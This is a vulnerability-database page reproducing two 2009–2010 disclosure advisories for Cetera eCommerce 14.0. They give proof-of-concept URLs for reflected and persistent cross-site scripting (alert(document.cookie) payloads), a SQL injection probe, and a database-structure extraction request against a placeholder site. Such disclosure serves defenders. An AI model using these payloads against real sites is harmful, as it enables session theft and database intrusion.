Vulners
Lucene search
Cetera eCommerce 14.0 Cross Site Scripting / SQL Injection
`=============================================================
I want to warn you about security vulnerabilities in Cetera eCommerce. Which
I disclosed already in December 2009 (SecurityVulns ID: 10489).
-----------------------------
Advisory: Vulnerabilities in Cetera eCommerce
-----------------------------
URL: http://websecurity.com.ua/3640/
-----------------------------
Affected products: Cetera eCommerce 14.0 and previous versions.
-----------------------------
Timeline:
01.03.2009 - found vulnerabilities.
30.10.2009 - announced at my site.
31.10.2009 - informed developers.
23.12.2009 - disclosed at my site.
-----------------------------
Details:
These are Insufficient Anti-automation and Cross-Site Scripting
vulnerabilities.
Insufficient Anti-automation:
http://site/
http://site/account/
There is no protection against automated requests (captcha) in forms at
these pages.
XSS:
http://site/account/?messageES=s9&messageParam[0]=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/cms/index.php?messageES=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/cms/index.php?messageES=s9&messageParam[0]=%3Cscript%3Ealert(document.cookie)%3C/script%3E
Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
=============================================================
I want to warn you about security vulnerabilities in Cetera eCommerce.
-----------------------------
Advisory: New vulnerabilities in Cetera eCommerce
-----------------------------
URL: http://websecurity.com.ua/4266/
-----------------------------
Affected products: Cetera eCommerce 14.0 and previous versions.
-----------------------------
Timeline:
31.10.2009 - found vulnerabilities.
31.10.2009 - informed developers about persistent XSS in their engine by
placing special code (designed to draw attention) directly at their site.
05.06.2010 - announced at my site.
07.06.2010 - informed developers.
28.07.2010 - disclosed at my site.
-----------------------------
Details:
These are Cross-Site Scripting, SQL Injection and SQL DB Structure
Extraction vulnerabilities.
XSS:
http://site/cms/templates/search.php?q=111&sobject=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/cms/templates/bannerlist.php?deleted=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/cms/templates/bannerlist.php?errorMessage=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/cms/templates/banner.php?errorMessage=%3Cscript%3Ealert(document.cookie)%3C/script%3E
XSS (Persistent):
At page http://site/cms/templates/banner.php?bannerId=1
<script>alert(document.cookie)</script>
In fields: Title, Text.
SQL Injection:
http://site/cms/templates/banner.php?bannerId=1%20and%20version()=5
SQL DB Structure Extraction:
http://site/cms/templates/bannerlist.php?page=-1
Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
28 Jul 2010 00:00Current
0.5Low risk
Vulners AI Score0.5